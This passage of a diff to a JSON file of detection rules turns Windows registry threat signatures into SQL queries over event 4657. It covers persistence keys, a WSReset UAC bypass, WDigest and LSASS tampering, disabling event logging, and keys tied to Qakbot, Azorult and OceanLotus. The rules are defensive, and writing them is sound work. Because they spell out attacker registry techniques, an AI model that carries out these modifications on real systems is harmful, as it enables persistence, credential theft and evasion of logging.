'\\' AND (TargetObject LIKE '%\\\\DisableExceptionChainValidation' ESCAPE '\\' OR TargetObject LIKE '%\\\\MitigationOptions' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\ClickToRunStore\\\\HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\PreviousPolicyAreas%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\MaxNoGPOListChangesInterval%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000009)', 'DWORD (0x000003c0)')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Delete Cached Update Binary' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe\"' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%Stamp' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_currentversion_nt.yml" + "filename": "registry_set_persistence_outlook_todaypage.yml" }, { - "title": "Registry Hide Function from User", - "id": "5a93eb65-dffa-4543-b761-94aa60098fb6", - "status": "test", - "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)", + "title": "Registry Disable System Restore", + "id": "5de03871-5d46-4539-a82d-3aa992a69a83", + "status": "experimental", + "description": "Detects the modification of the registry to disable a system restore on the computer", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate admin script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideClock' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAHealth' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCANetwork' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAPower' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAVolume' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowInfoTip' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowCompColor' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE '%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "registry_set_hide_function_user.yml" + "filename": "registry_set_disable_system_restore.yml" }, { - "title": "Potential Persistence Using DebugPath", - "id": "df4dc653-1029-47ba-8231-3c44238cc0ae", + "title": "Potential Qakbot Registry Activity", + "id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", "status": "experimental", - "description": "Detects potential persistence using Appx DebugPath", - "author": "frack113", + "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", + "author": "Hieu Tran", "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ActivatableClasses\\\\Package\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\DebugPath' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PackagedAppXDebug\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE '\\')" ], - "filename": "registry_set_persistence_appx_debugger.yml" + "filename": "registry_event_malware_qakbot_registry.yml" }, { - "title": "Change User Account Associated with the FAX Service", - "id": "e3fdf743-f05b-4051-990a-b66919be1743", - "status": "experimental", - "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", - "author": "frack113", + "title": "Disable Security Events Logging Adding Reg Key MiniNt", + "id": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", + "status": "test", + "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ "attack.defense_evasion", + "attack.t1562.001", "attack.t1112" ], "falsepositives": [ @@ -33546,1169 +33295,1278 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (NewValue LIKE '%NetworkService%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" ], - "filename": "registry_set_fax_change_service_user.yml" + "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" }, { - "title": "Disable Windows Security Center Notifications", - "id": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", - "status": "experimental", - "description": "Detect set UseActionCenterExperience to 0 to disable the windows security center notification", - "author": "frack113", + "title": "Registry Entries For Azorult Malware", + "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", + "status": "test", + "description": "Detects the presence of a registry key created during Azorult execution", + "author": "Trent Liffick", "tags": [ - "attack.defense_evasion", + "attack.execution", "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Windows\\\\CurrentVersion\\\\ImmersiveShell\\\\UseActionCenterExperience' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' ESCAPE '\\')" ], - "filename": "registry_set_disable_security_center_notifications.yml" + "filename": "registry_event_mal_azorult.yml" }, { - "title": "Enable Microsoft Dynamic Data Exchange", - "id": "63647769-326d-4dde-a419-b925cc0caf42", + "title": "DLL Load via LSASS", + "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", "status": "test", - "description": "Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.", - "author": "frack113", + "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1559.002" + "attack.persistence", + "attack.t1547.008" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\Word\\\\Security\\\\AllowDDE' ESCAPE '\\' AND NewValue IN ('DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLaunch' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLookup' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND (NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" ], - "filename": "registry_set_office_enable_dde.yml" + "filename": "registry_event_susp_lsass_dll_load.yml" }, { - "title": "Potential Persistence Via COM Hijacking From Suspicious Locations", - "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", - "status": "experimental", - "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Run Key from Download", + "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", + "status": "test", + "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1546.015" + "attack.t1547.001" ], "falsepositives": [ - "Probable legitimate applications. If you find these please add them to an exclusion list" + "Software installers downloaded and used by users" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%appdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" ], - "filename": "registry_set_persistence_com_hijacking_susp_locations.yml" + "filename": "registry_event_susp_download_run_key.yml" }, { - "title": "Changing RDP Port to Non Standard Number", - "id": "509e84b9-a71a-40e0-834f-05470369bd1e", + "title": "Pandemic Registry Key", + "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", "status": "test", - "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", - "author": "frack113", + "description": "Detects Pandemic Windows Implant", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.010" + "attack.lateral_movement", + "attack.t1105" + ], + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" + ], + "filename": "registry_event_apt_pandemic.yml" + }, + { + "title": "UAC Bypass Via Wsreset", + "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", + "status": "test", + "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", + "author": "oscd.community, Dmitry Uchakin", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (NewValue = 'DWORD (0x00000d3d)'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" ], - "filename": "registry_set_change_rdp_port.yml" + "filename": "registry_event_bypass_via_wsreset.yml" }, { - "title": "Common Autorun Keys Modification", - "id": "f59c3faf-50f3-464b-9f4c-1b67ab512d99", + "title": "Wdigest CredGuard Registry Modification", + "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", + "status": "test", + "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE '\\')" + ], + "filename": "registry_event_disable_wdigest_credential_guard.yml" + }, + { + "title": "Registry Persistence Mechanisms in Recycle Bin", + "id": "277efb8f-60be-4f10-b4d3-037802f37167", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)", + "description": "Detects persistence registry keys for Recycle Bin", + "author": "frack113", "tags": [ "attack.persistence", - "attack.t1547.001" + "attack.t1547" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows CE Services\\\\AutoStart%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\Setup\\\\CmdLine%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Ctf\\\\LangBarAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Handler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Htmlfile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Environment\\\\UserInitMprLogonScript%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\UrlSearchHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Desktop\\\\Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Classes\\\\Clsid\\\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\\\Inprocserver32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR ((TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRunStore\\\\HKMU\\\\SOFTWARE\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\') OR NewValue IN ('{314111c7-a502-11d2-bbca-00c04f8ec294}', '{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}', '{42089D2D-912D-4018-9087-2B87803E93FB}', '{5504BE45-A83B-4808-900A-3A5C36E7F77A}', '{807583E5-5146-11D5-A672-00B0D022E945}')) OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{8A69D345-D564-463c-AFF1-A69D9E530F96}\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{89820200-ECBD-11cf-8B85-00AA005B4383}\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((EventType = 'RenameKey' AND NewName LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_common.yml" + "filename": "registry_event_persistence_recycle_bin.yml" }, { - "title": "WinSock2 Autorun Keys Modification", - "id": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", + "title": "OceanLotus Registry Activity", + "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", + "author": "megan201296, Jonhnathan Ribeiro", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WinSock2\\\\Parameters%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Protocol\\_Catalog9\\\\Catalog\\_Entries%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NameSpace\\_Catalog5\\\\Catalog\\_Entries%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\MsiExec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE '\\'))))" ], - "filename": "registry_set_asep_reg_keys_modification_winsock2.yml" + "filename": "registry_event_apt_oceanlotus_registry.yml" }, { - "title": "New Root or CA or AuthRoot Certificate to Store", - "id": "d223b46b-5621-4037-88fe-fda32eead684", - "status": "experimental", - "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry", - "author": "frack113", + "title": "FlowCloud Malware", + "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", + "status": "test", + "description": "Detects FlowCloud malware from threat group TA410.", + "author": "NVISO", "tags": [ - "attack.impact", - "attack.t1490" + "attack.persistence", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE 